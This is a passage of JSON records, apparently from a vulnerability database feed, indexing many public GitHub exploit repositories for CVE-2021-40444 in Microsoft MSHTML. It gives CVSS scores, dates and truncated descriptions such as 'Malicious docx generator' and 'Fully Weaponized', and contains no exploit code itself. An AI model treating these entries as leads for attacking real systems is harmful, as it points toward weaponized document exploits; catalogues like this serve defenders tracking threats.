true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-07-12T14:51:36", "id": "28B1FAAB-984F-5469-BC0D-3861F3BCF3B5", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:10:41", "description": "# Docx-Exploit-2021\n\nThis docx exploit uses r...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-29T10:35:55", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-04-11T07:58:23", "id": "B9C2639D-9C07-5F11-B663-C144F457A9F7", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-31T08:47:22", "description": "# Fully Weaponized CVE-2021-40444\n\nMalicious docx generator to e...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-15T22:34:35", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-05-31T01:08:02", "id": "29AB2E6A-3E44-55A2-801D-2971FABB2E5D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:03:37", "description": "# CVE-2021-40444-URL-Extractor\n\nPython script to extract embedde...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-16T16:54:50", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-20T19:01:48", "id": "0E965070-1EAE-59AA-86E6-41ADEFDAED7D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:38:09", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-22T13:29:20", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-11-22T13:41:39", "id": "DD5D2BF7-BE9D-59EA-8DF2-D85AEC13A4A0", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-26T03:16:25", "description": "# CVE-2021-40444-POC\nAn attempt to reproduce Microsoft MSHTML Re...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-28T14:55:46", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-01-26T02:46:54", "id": "8B907536-B213-590D-81B9-32CF4A55322E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T02:21:49", "description": "# Microsoft-Office-Word-MSHTML-Remote-Code-Exe...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-19T08:16:07", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-09-16T21:49:48", "id": "AAFEAA7E-81B7-5CE7-9E2F-16828CC5468F", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:38:48", "description": "# TIC4301_Project\nTIC4301 Project - CVE-2021-40444\n\nDownload the...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-16T07:07:26", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-06T13:36:02", "id": "111C9F44-593D-5E56-8040-615B48ED3E24", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:04:29", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-14T20:32:28", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-18T19:46:25", "id": "7DE60C34-40B8-50E4-B1A0-FC1D10F97677", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-24T07:50:01", "description": "# CVE-2021-40444_CAB_archives\nCVE-2021-40444 - Custom CAB templa...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-24T10:59:34", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-15T00:43:34", "id": "B7D137AD-216F-5D27-9D7B-6F3B5EEB266D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:25", "description": "# CVE-2021-40444 docx Generate\ndocx generating to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-11T05:31:52", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-10-14T23:45:35", "id": "0990FE6E-7DC3-559E-9B84-E739872B988C", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-05T05:19:33", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-06-05T02:27:21", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-06-05T02:29:52", "id": "1934A15D-9857-5560-B6CA-EA6A2A8A91F8", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-09T21:51:56", "description": "# Microsoft MSHTML Remote Code Execution Vulnerability CVE-2021-...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-08T08:32:40", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-01-09T21:16:38", "id": "FBB2DA29-1A11-5D78-A28C-1BF3821613AC", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:34:32", "description": "# Fully Weaponized CVE-2021-40444\n\nMalicious docx generator to e...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-28T06:33:25", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-28T09:38:18", "id": "CCA69DF0-1EB2-5F30-BEC9-04ED43F42EA5", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:05:20", "description": "# CVE-2021-40444\nCVE-2021-40444 POC\n\n-----BEGIN PUBLIC KEY-----\n...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-09T02:30:26", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-17T10:41:29", "id": "37D2BE4F-9D7A-51CD-B802-2FAB35B39A4E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T22:52:51", "description": "# CVE-2021-40444--CABless version\nUpdate: Modified code so that ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-19T19:46:28", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-07-17T22:25:33", "id": "0E388E09-F00E-58B6-BEFE-026913357CE0", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T02:36:47", "description": "CVE-2021-40444 builders\n\nThis repo contain builders of cab file,...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-12T18:05:53", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-09-16T21:47:26", "id": "8CD90173-6341-5FAD-942A-A9617561026A", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-24T12:46:04", "description": "# CVE-2021-40444 docx Generate\n.docx generate...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-11T02:49:37", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-24T11:57:05", "id": "88EFCA30-5DED-59FB-A476-A92F53D1497E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:05:39", "description": "\"Fork\" of [lockedbytes](https://github.com/lockedbyte) CVE-2021-...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-14T13:45:36", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-15T14:42:59", "id": "F5CEF191-B04C-5FC5-82D1-3B728EC648A9", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:05", "description": "# \u3016EXP\u3017Ladon CVE-2021-40444 Office\u6f0f\u6d1e\u590d\u73b0\n\n\n### \u6f0f\u6d1e\u6982\u8ff0\n\n\u5317\u4eac\u65f6\u95f49\u67088\u65e5\uff0c\u7eff\u76df\u79d1\u6280...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-14T17:10:48", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-40444"], "modified": "2021-11-15T04:16:33", "id": "FF761088-559C-5E71-A5CD-196D4E4571B8", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-22T16:51:26", "description": "# CVE-2021-44228-Mass-RCE\nCVE-2021-44228 Mass Exploitation 